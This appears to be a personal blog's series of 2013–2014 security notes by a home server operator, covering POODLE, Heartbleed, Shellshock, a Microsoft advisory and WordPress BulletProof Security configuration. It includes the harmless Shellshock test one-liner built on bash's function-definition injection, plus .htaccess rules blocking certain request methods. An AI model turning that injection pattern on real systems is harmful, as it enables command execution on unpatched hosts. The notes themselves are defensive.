Memorandum #7.

Update information      Edit(Oct.18)

   Did you already handle “POODLE” issue, i.e. CVE-2014-3566? OpenSSL Security Advisory [15 Oct 2014] is also related to this.

   First, as a web site operator:
   I haven’t got the new version build with 1.0.1j from Apache Lounge yet, so I’ve done the workaround I read on “SSL v3 goes to the dogs – POODLE kills off protocol”.

   I added the SSLProtocol All -SSLv3 to my httpd-ssl.conf and restarted the httpd.exe. Before this, SSL Server Test gave me “This server is vulnerable to the POODLE attack. If possible, disable SSL 3 to mitigate. Grade capped to C”. But after this, it gave me “This server is not vulnerable to the POODLE attack because it doesn’t support SSL 3”. Actually, I use Apache 2.4 and OpenSSL 1.0.1, so at my mod_ssl ‘SSLProtocol all’ means ‘SSLProtocol +SSLv3 +TLSv1 +TLSv1.1 +TLSv1.2’ according to SSLProtocol Directive.

   Second, as a user:
   I did the following workaround. See “How to protect your browser”.

Edit(Oct.18):
 PHP 5.6.1 —>> PHP 5.6.2 ChangeLog.
 phpMyAdmin 4.2.9.1 —>> phpMyAdmin 4.2.10 ChangeLog.

ShellShock, shock shock shock!

Update information      Edit(Sep.30)    Edit2(Oct.6)

   Whew!!
   Have you coped with the threat from ShellShock, yet? My server is on Windows OS. Hence I think the vulnerability gives no effect to mine. But it’s a very serious one. NVD gave the impact score 10 to this. I have a CentOS 6.5 on my VMware, so I updated its bash to bash-4.1.2-15.el6_5.2.i686.

   If you still have the following messages after updating and doing env x='() { :;}; echo
vulnerable' bash -c "echo this is a test"
, your bash need more updating.
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for 'x'
this is a test

   I got the information form Masanari Iida’s comment on Red Hat Customer Portal.

   Several links which I am curious about, actually tons of articles about it on the Internet:

   By the way, I had the ShellShock attacks six times and blocked their IPs until yesterday, and today two more from other IPs until now on the Apache error log. I found that all of them my Apache returned HTTP Error Codes to.

Edit(Sep.30):
   On “Bash bug: apply Florian’s patch now” he said “I very strongly recommend manually deploying Florian’s patch unless your distro is already shipping it.” and how to check the patch applied or not.

   When you do foo='() { echo not patched; }' bash -c foo within the shell, the patch is already applied if you have “command not found”. If you have “not patched”, your bash is still vulnerable.

   On its comment vdp wrote “These ‘toughen the feature’ patches still feel quite scary.” and a suggestion. I agree with him.

Edit2Oct.6):
   Today, I’ve found this (Japanese).

   Woooo!
   It says that it’s not enough to check the bash by the code foo='() { echo not patched; }'
bash -c foo
. Nonetheless, they have less critical than CVE-2014-6271 or CVE-2014-7169. But still dangerous.

Microsoft Security Advisory 2915720-#2

   Do you remember my post “Microsoft Security Advisory 2915720 ???”? Now August 12 is approaching, so I wonder how it’s going on. For about a week, my translation was getting down to the wire in my mind, I missed the new revision about Microsoft Security Advisory 2915720, but I suddenly found yesterday.

   To conclude is “Microsoft no longer plans to enforce the stricter verification behavior as a default functionality on supported releases of Microsoft Windows.” But they also say “It remains available as an opt-in feature.”

   According to the well-informed, they are keenly reminded of its severe effects than expected, and then they give it up at this time.

I’ve got an email from No-IP.

Update information      Edit(Jul.11)

   I’ve got an email from No-IP because I use a No-IP domain for my net radio. Its title is ★ Update to Microsoft Takedown – All Domains Restored ★. Of course, it’s related to Microsoft takes on global cybercrime epidemic in tenth malware disruption“. The original article has gone, so I link to the history in The Internet Archive (2014.9.24).

The email from No-IP
The email from No-IP

   Hey! No-IP. Are you doing OK from now?

Edit(Jul.11):
   Today, I have the second email from No-IP.

The email from No-IP
The email #2 from No-IP

   No-IP gives us more information on the page “Update: Details on Microsoft Takeover“.

   Anyway, congratulations for surviving, No-IP.

Updating Apache because of OpenSSL Security Advisory [05 Jun].

Update information      Edit(Jun.9)

   I updated my Apache 2.4.9 to 2014 5 Jun version because of OpenSSL Security Advisory [05 Jun]..

   It is built with ‘IPv6 Crypto apr-1.5.0 apr-util-1.5.3 apr-iconv-1.2.1 openssl-1.0.1h zlib-1.2.8 pcre-8.34 libxml2-2.9.1 lua-5.1.5 expat-2.1.0’. Its Changelog.

   I really appreciate Steffen’s hard and quick work. Thanks again, Steffen.

Edit(Jun.9):
   I found this on the Net, so linked to it as a reference.
OpenSSL Patches Critical Vulnerabilities Two Months After Heartbleed

Microsoft Security Advisory 2915720 ???

   Now we have June. On Microsoft Security Advisory 2915720 they announced “Changes in Windows Authenticode Signature Verification”, and the Advisory was first published at 10 Dec. 2013. They said “The change is included with Security Bulletin MS13-098, but will not be enabled until June 11, 2014.” and suggested this actions.

   So I tested my PCs by “EnableCertPaddingCheck”=”1”, the PCs are a CF-J10(Win7 HP Sp1 64bit), an NJ2100(Win8 Pro 32bit), xw4200(Win7 HP Sp1 32bit) and KeyPaso(Vista Business SP2 32bit). But I have no troubles right now. Do you know what environments give me troubles under enabling CertPaddingCheck?

   By the way, I found Microsoft Security Advisory 2915720 was Updated on 21 May 2014 and the enabling date changed from June 11 to August 12.

Updating Apache because of CVE-2014-0160.

Update information      Edit(May.13)

   I updated my Apache 2.4.9 to 2014 Apr 8 version because of CVE-2014-0160.

   It is built with ‘IPv6 Crypto apr-1.5.0 apr-util-1.5.3 apr-iconv-1.2.1 openssl-1.0.1g zlib-1.2.8 pcre-8.34 libxml2-2.9.1 lua-5.1.5 expat-2.1.0′. Its Changelog.

   I really appreciate Steffen’s hard and quick work. Thanks again, Steffen.

Edit(May.13):
   This vulnerability also has effects on everyday life as I’ve worried about. Some OS of smartphones might have the vulnerability. I’ve found the list out. ⇒ The list of Android phones vulnerable to Heartbleed bug

   And you can check your smartphone OS about the vulnerability by the Heartbleed Detector App.

   I add three sites about Heartbleed detector you can access by a PC.
     Heartbleed test
     heartbleed test
     Trend Micro Heartbleed Detector (does not exist anymore.)

CVE-2012-1823

   I watched “さくらのVPSに来る悪い人を観察する その2” and “SSH ハニーポットでの悪い人の観察“, then rolled on the floor, laughing. I first found this on “徳丸浩の日記” which reads the slide show is very interesting and very popular lately, so I went to the slide show to be sure it and agreed with it.

   The slide show is related to CVE-2012-1823. Actually, the attacks the slide#36 shows come everywhere whether the vulnerability exists or not. My server is no exception. I don’t create SSH server, and my PHP doesn’t have the vulnerability nor isn’t CGI version, so all attacks failed though.

   Ozuma5119 is a genuine white hacker. If you’re up for this topic, visit the linked sites though they are only in Japanese. Please use some translation services m(_”_)m.

I can’t accept this is happening, but it is true.

   On December 20th, Reuters broke “Exclusive: Secret contract tied NSA and security industry pioneer“. On December 23rd, Mikko Hypponen wrote “An Open Letter to the Chiefs of EMC and RSA“.

   I can’t accept this is happening, but Mikko wrote such a letter shows us the article is almost true. For NSA, it might be their regular jobs. But for RSA, what a shame!! Of course, we should read not only Reuters side articles but also the opposite side ones like RSA RESPONSE TO MEDIA CLAIMS REGARDING NSA RELATIONSHIP.

   It is a sad fact that RSA’s credibility was destroyed.

A WordPress Plugin “BulletProof Security”.

Update information      Edit(Dec.2)~~Edit4(2014.Jul.14)    Edit5(Jul.16)

   I installed the Plugin “BulletProof Security” for my WordPress security. It’s easy to install. But there is something you should consider in activating if you also use it.

  1. Though it is Network / Multisite Compatible, you should NOT make it Network Activated. Network Deactivate BulletProof Security and then activate BulletProof Security on your Primary site ONLY.
  2. BulletProof Security uses .htaccess files, so you should back up the otiginal files in your WordPress Root and wp-admin folders before its activating.
  3. BulletProof Security uses .htaccess files, so it depends on your server configuration if you can use it or not. In my case, I had an error, so I added Options=Indexes to my AllowOverride Directive in the <Directory> section of the httpd.conf.

   By the way, I found BulletProof Security introduced Sucuri SiteCheck Scanner on one of its pages. So I tried to scan my WordPress sites. On the sites, no threats were found, though they say “Sucuri SiteCheck is a free & remote scanner. Although we do our best to provide the best results, 100% accuracy is not realistic, and not guaranteed”.

Edit(Dec.2):
   The plugin ‘Broken Link Checker’ gave me the message below:

   Broken Link Checker has detected 1 new broken link on your site.
   Here’s a list of the new broken links:
   Link text : Asus ,HCL X51C (T12C) Motherboard schematic
   Link URL : /blog-j/files/Asus_HCL_X51C_(T12C).pdf
   Source : ノートをWin8 Proにアップグレード。
   You can see all broken links here: http://My WP dashboard tool URL

   Why suddenly? This PDF file I uploaded on Oct.16 and have not made any changes to it. I got another message when I accessed the PDF by a browser. Like this:

   o6asan.com 403 Forbidden Error Page
   If you arrived here due to a search or clicking on a link click your Browser’s back button
   to return to the previous page. Thank you.

   I found out this message by the ‘BulletProof Security’ and also found ‘BulletProof Security’ not to allow accessing the file which has ( or ) in its filename. So, I changed from Asus_HCL_X51C_(T12C).pdf to Asus_HCL_X51C-T12C.pdf. Now I don’t have the errors. that’s.it.

Edit2(Dec.3):
   I got an update to version .49.7 today, and we can use “Network Activate” on Network / Multisite now, I just wrote that we were unable to use it though. Of course you can also use it by your old configuration.
   By the way, I’ll write an addition to Edit(Dec.2). BPS does not allow accessing the file which has a space in its file name, either.

Edit3(Dec.4):
   Lately, I edit this page everyday (^_^;). This time, Mr.’BulletProof Security’ blocked my flash movies. When I accessed 高住神社-video1, I got the you-know-message “Movie not loaded”. I directed a doubtful look at the Adobe Flash Player because this phenomenon is usually occurred by the player. But, it is not guilty this time-HaHa.
   I found out this as a solution. Flash swf 403 error – Flash slideshow blocked
   I added the next bold italic letters to the root .htaccess file. That’s it.
   RewriteRule .* index.php [F,L]
   RewriteCond %{REQUEST_URI} (flvplayer\.swf|timthumb\.php|~~|thumbs\.php) [NC]

Edit4(2014.Jul.14):
   Recently, I had a lot of 500 Internal Server Error errors on my server log. First, it looked like related to the font-face decoration. But, I finally found that the .htaccesses of BPS gave them when a URI has a ? at its end. I went to the WordPress Japanese forum and the BulletProof Security Free forum. I got the solution from them. Now, the errors have gone. Happy!!

   If you need more information, please see the following topics.
   IE11(Win8.1),IE10(Win7)で,アクセスしたとき,font.eotについてエラーがでる。
   font-face 500 Internal Server Errors

Edit5(Jul.16):
   I had a lot of 403 Forbidden Errors related to my own site on my http_error_log.txt because of the plugin Broken Link Checker uses Head Method. I’ve known the Broken Link Checker uses Head Method since 2012.Dec.29. But I want to use these two plugins, so, I’ve accepted the situation because I don’t know how I can fix it.

   However, when I checked the .htaccess up for this 500 Internal Server Error, I found the following sentences. Wow!!
# REQUEST METHODS FILTERED
# This filter is for blocking junk bots and spam bots from making a HEAD request, but may also
# block some HEAD request from bots that you want to allow in certain cases. This is not a
# security filter and is just a nuisance filter. This filter will not block any important bots
# like the google bot. If you want to allow all bots to make a HEAD request then remove HEAD
# from the Request Method filter.
# The TRACE, DELETE, TRACK and DEBUG request methods should never be allowed against
# your website.
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK|DEBUG) [NC]
RewriteRule ^(.*)$ - [F,L]

   This means I can remove HEAD from it? Immediately I removed HEAD from the .htaccess in my root folder. The .htaccess in my wp-admin folder I leave the default, because the Broken Link Checker doesn’t access to the wp-admin folder.

   It works very well as I expected (*´▽`*).